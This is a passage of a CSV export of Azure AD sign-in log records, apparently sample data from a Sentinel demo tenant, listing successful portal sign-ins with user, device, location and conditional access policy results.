'GB', 'geoCoordinates': {'longitude': -0.19916999340057373, 'latitude': 51.49555969238281}, 'state': 'Greater London', 'city': 'Kensington And Chelsea'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 2,2f3450f9-6201-430f-9235-25062d3f412b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e82050b8-a2c4-426d-8c05-8f1d68870e00,SigninLogs,Sucess,51.49555969,-0.199169993
+1035,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:12.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a48cef3d-3f31-4609-a671-f60b3b008f6b,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",e82050b8-a2c4-426d-8c05-8f1df48e0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e82050b8-a2c4-426d-8c05-8f1df48e0e00,SigninLogs,Sucess,38.47222137,-77.41989899
+1036,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:03.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,defb16d0-c665-4eca-b2fa-3a9dcbd50f37,Microsoft.aadiam,Microsoft.aadiam,,Kara Cole,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '60eb367a-c3d0-4249-87bc-f5be7ee85e20', 'browser': 'Edge 18.1836', 'displayName': 'KARACOLE', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",1abd7331-2916-4cb6-bc4e-7600cff83500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -70.7354965209961, 'latitude': 43.08761978149414}, 'state': 'Maine', 'city': 'Kittery'}",none,none,none,none,[],{'errorCode': 0},Kara Cole,2d80a793-b857-48bc-8308-2411d8906bdd,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1abd7331-2916-4cb6-bc4e-7600cff83500,SigninLogs,Sucess,43.08761978,-70.73549652
+1037,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:52.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7310f976-b66c-44b4-9c11-e3ef73e2a492,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:26,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",5fb3911e-4ad1-4368-88ca-ea08a4653e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5fb3911e-4ad1-4368-88ca-ea08a4653e00,SigninLogs,Sucess,38.47222137,-77.41989899
+1038,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:05.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,defb16d0-c665-4eca-b2fa-3a9dcbd50f37,Microsoft.aadiam,Microsoft.aadiam,,Kara Cole,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '60eb367a-c3d0-4249-87bc-f5be7ee85e20', 'browser': 'Edge 18.1836', 'displayName': 'KARACOLE', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",15e86e8a-e140-4c96-8068-fad7d16b4000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -70.7354965209961, 'latitude': 43.08761978149414}, 'state': 'Maine', 'city': 'Kittery'}",none,none,none,none,[],{'errorCode': 0},Kara Cole,2d80a793-b857-48bc-8308-2411d8906bdd,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,15e86e8a-e140-4c96-8068-fad7d16b4000,SigninLogs,Sucess,43.08761978,-70.73549652
+1039,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:52.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c0245186-29e3-436a-add4-db4926700d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c0245186-29e3-436a-add4-db4926700d00,SigninLogs,Sucess,33.0175209,35.44601059
+1040,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:52.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c0245186-29e3-436a-add4-db4926700d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c0245186-29e3-436a-add4-db4926700d00,SigninLogs,Sucess,33.0175209,35.44601059
+1041,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:51.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",85789f99-3a4c-45a5-91bc-0194eaa90e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,85789f99-3a4c-45a5-91bc-0194eaa90e00,SigninLogs,Sucess,33.0175209,35.44601059
+1042,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:52.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 